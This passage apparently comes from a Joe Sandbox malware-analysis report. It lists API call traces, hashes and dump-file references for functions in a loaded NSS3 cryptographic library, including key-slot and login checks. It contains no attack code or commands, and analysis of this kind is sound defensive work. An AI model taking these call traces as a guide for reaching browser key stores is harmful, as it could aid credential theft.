                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1091488953-0
                                                                                                                                                                                                                                                      • Opcode ID: ab696be14843d5d0651000a603ceec293127735ca39ed1935b20ebe4536ae647
                                                                                                                                                                                                                                                      • Instruction ID: d30511af52402c2ea8b1f9a1e1ab657b394bc275dab328c84ce2a1ced914b554
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab696be14843d5d0651000a603ceec293127735ca39ed1935b20ebe4536ae647
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D31B7B29006246BEF00EF69AD41FBB7BA89F54609F050139ED09A7751FB31D91486E2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C477E48
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C477E5B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C477E7B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C59925C,?), ref: 6C477E92
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C477EA1
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(00000004), ref: 6C477ED1
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(00000004), ref: 6C477EFA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_Arena_FindItem_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3989529743-0
                                                                                                                                                                                                                                                      • Opcode ID: 315a16e323f488ecc4cb802a9f281815cf290a94d08a32cace915d36feea165d
                                                                                                                                                                                                                                                      • Instruction ID: 677cfb5c98120e0505d8e5d4d079466cc86887269ab1090d0703ff0481d9a10a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 315a16e323f488ecc4cb802a9f281815cf290a94d08a32cace915d36feea165d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4318FB2E052119BEB21DA659D40FAB77A8EF44259F564828DD19EBB01E720FC04C7F1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C4CD9E4,00000000), ref: 6C4CDC30
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C4CD9E4,00000000), ref: 6C4CDC4E
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C4CD9E4,00000000), ref: 6C4CDC5A
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4CDC7E
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4CDCAD
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Alloc_Util$Arenamemcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2632744278-0
                                                                                                                                                                                                                                                      • Opcode ID: 4b9a72d80384a1e0d8ad25befe4b53753f44dcd72e8b0877b3ad2aa5ed507521
                                                                                                                                                                                                                                                      • Instruction ID: 4ada438c8fb228685ece9323e89370b2de5b82c67103bebddc217d7e74ba9a64
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b9a72d80384a1e0d8ad25befe4b53753f44dcd72e8b0877b3ad2aa5ed507521
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD318DB9A402009FE710DF59DC84E96B7F8AF04358F148029E949CBB10E7B1E944CBA2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C48E728,?,00000038,?,?,00000000), ref: 6C492E52
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C492E66
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C492E7B
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 6C492E8F
                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(?,?), ref: 6C492E9E
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C492EAB
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C492F0D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3106257965-0
                                                                                                                                                                                                                                                      • Opcode ID: 60f5b62d1d4f5c7b66f2f3019fae9a740bca5fb6b8f4ffc1c3a1e6366fbc1de6
                                                                                                                                                                                                                                                      • Instruction ID: bc05a042e1911b5117ee8dd2577e6361dbec1dc7ab1f5d16e0594a5ffe435b35
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60f5b62d1d4f5c7b66f2f3019fae9a740bca5fb6b8f4ffc1c3a1e6366fbc1de6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5631F479A00515ABEB01EF28DC84C6ABB78FF56259B458178ED0887B11EB31ED64C7E0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,S&Kl,6C496295,?,00000000,?,00000001,S&Kl,?), ref: 6C4B1ECB
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,00000001,?,S&Kl,6C496295,?,00000000,?,00000001,S&Kl,?), ref: 6C4B1EF1
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4B1F01
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4B1F39
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BFE20: TlsGetValue.KERNEL32(6C495ADC,?,00000000,00000001,?,?,00000000,?,6C48BA55,?,?), ref: 6C4BFE4B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BFE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4BFE5F
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B1F67
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$CriticalEnterErrorSection$Unlock
                                                                                                                                                                                                                                                      • String ID: S&Kl
                                                                                                                                                                                                                                                      • API String ID: 704537481-2478177983
                                                                                                                                                                                                                                                      • Opcode ID: 77a0d1b373536fc18443302e3e88730a4d0d41699ecf0fb6af502da708a4b666
                                                                                                                                                                                                                                                      • Instruction ID: 7fbdf13bd2eff6ae8f22998a0cb4cfd9092c546150f6028bdcc372b9a53b902f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77a0d1b373536fc18443302e3e88730a4d0d41699ecf0fb6af502da708a4b666
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75210175A04204ABEB00EF29DC44F9A3769AF85369F194128FD08ABB01E730E954C6F0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?,6C4DCD93,?), ref: 6C4DCEEE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C4DCD93,?), ref: 6C4DCEFC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C4DCD93,?), ref: 6C4DCF0B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D08B4
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C4DCD93,?), ref: 6C4DCF1D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF47
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF67
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,00000000,6C4DCD93,?,?,?,?,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF78
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4291907967-0
                                                                                                                                                                                                                                                      • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                                                                                                      • Instruction ID: a9b4ad21d98da494e41a0d4d2ea41cddc45b89b5bfbeb302f5d4d6e56ea57f08
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F11A8A5F0120457E700FAA66C61FABB6EC9F5455EF05413DEC09D7B81FB60E90886F2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C488C1B
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32 ref: 6C488C34
                                                                                                                                                                                                                                                      • PL_ArenaAllocate.NSS3 ref: 6C488C65
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C488C9C
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C488CB6
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                                                                                      • String ID: KRAM
                                                                                                                                                                                                                                                      • API String ID: 4127063985-3815160215
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PK11_GetInternalKeySlot.NSS3(?,?,?,6C4B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C484F1C), ref: 6C498EA2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C4BF854
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C4BF868
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C4BF882
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C4BF889
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C4BF8A4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C4BF8AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C4BF8C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C4BF8D0
                                                                                                                                                                                                                                                      • PK11_IsLoggedIn.NSS3(?,?,?,6C4B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C484F1C), ref: 6C498EC3
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,6C4B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C484F1C), ref: 6C498EDC
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,6C4B2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C498EF1
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C498F20
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                                                                                                                                                                                      • String ID: b.Kl
                                                                                                                                                                                                                                                      • API String ID: 1978757487-3576770755
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C505B40: PR_GetIdentitiesLayer.NSS3 ref: 6C505B56
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C503E45
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C503E5C
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C503E73
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C503EA6
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C503EC0
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C503ED7
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C503EEE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Monitor$EnterValue$Exit$CriticalSection$ErrorIdentitiesLayerLeave
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2517541793-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6C582CA0
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6C582CBE
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000014), ref: 6C582CD1
                                                                                                                                                                                                                                                      • strdup.MOZGLUE(?), ref: 6C582CE1
                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C582D27
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • Loaded library %s (static lib), xrefs: 6C582D22
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                                                                                                      • String ID: Loaded library %s (static lib)
                                                                                                                                                                                                                                                      • API String ID: 3511436785-2186981405
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C47BDCA
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C47BDDB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C47BDEC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D116E
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6C47BE03
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C47BE22
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C47BE30
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47BE3B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1821307800-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1044
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,00000800,6C46EF74,00000000), ref: 6C4D1064
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
